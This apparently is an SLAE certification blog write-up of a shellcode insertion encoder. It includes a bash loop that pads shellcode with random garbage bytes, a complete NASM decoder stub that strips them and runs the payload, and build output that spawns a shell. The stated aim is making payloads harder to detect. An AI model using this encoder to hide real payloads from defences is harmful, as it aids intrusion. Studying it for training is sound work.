Insertion Encoder with permutations
Hello everyone,
Today I’m publishing the Insertion Encoder which uses the random opcode arrangement to encode the shellcode.
The idea is to add some garbage opcodes to the payload shellcode so that it will be harder to detect the payload. Below you can find the decoder which will bypass garbage opcodes and execute the original payload.
You can get the code here -> SLAE Assignment #4
Compiling and running the shellcode
exam4$ ./make.sh
[+] Compiling the payload and decoder ...
[+] Preparing decoder shellcode ...
[+] Encoding the payload shellcode ...
[+] Generating shellcode.c file ...
[+] Compiling shellcode.c with GCC ...
-rwx------. 1 arno arno 4980 Apr 11 14:14 ./shellcode
exam4$ ./shellcode
Shellcode Length: 114
sh-4.1$ exit
exit
Random opcode arrangement proof
Permutation code you can see in the make.sh script
[--- trimmed ---]
# Permutation code
garbage=('\x37' '\xFA' '\xD6' '\x3F');
#ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[$(shuf --random-source=/dev/urandom -z -i 999-999999 -n1)%4]]}; done; echo -n "\xAF\"")
ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[$(od -A n -N 2 -t u2 /dev/urandom)%4]]}; done; echo -n "\xAF\"")
[--- trimmed ---]
decoder.nasm
; This is a snippet of the original file https://github.com/arno01/SLAE/blob/master/exam4/decoder.nasm
section .text
global _start
_start:
jmp short _down ; JMP-CALL-POP technique
_up:
pop esi ; get the last address of this program,
; which will be a start of our encoded shellcode
xor ecx, ecx ; zero the counter, will be used below
_decoder:
mov al, byte [esi] ; preparing to compare the first byte of the encoded shellcode
inc esi ; going for the next byte
;
; Checking for markers
;
cmp al, 0x37
je short _decoder ; if current byte is a gargabe, then we skip it and check the next byte
cmp al, 0xFA
je short _decoder ; if current byte is a gargabe, then we skip it and check the next byte
cmp al, 0xD6
je short _decoder ; if current byte is a gargabe, then we skip it and check the next byte
cmp al, 0x3F
je short _decoder ; if current byte is a gargabe, then we skip it and check the next byte
cmp al, 0xAF
je short _runshellcode ; if we reach the exit marker, then we run the shellcode
;
; Collecting decoded shellcode in the ESP address
;
mov byte [esp+ecx], al ; moving good byte to ESP
inc ecx ; increase the counter
jmp short _decoder ; continuing
_runshellcode:
call esp
_down:
call _up ; ESP now has an address that points to the next instruction, however we are going UP
That’s all for now. Later I will make polymorphic version of the shellcode.
This page has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-323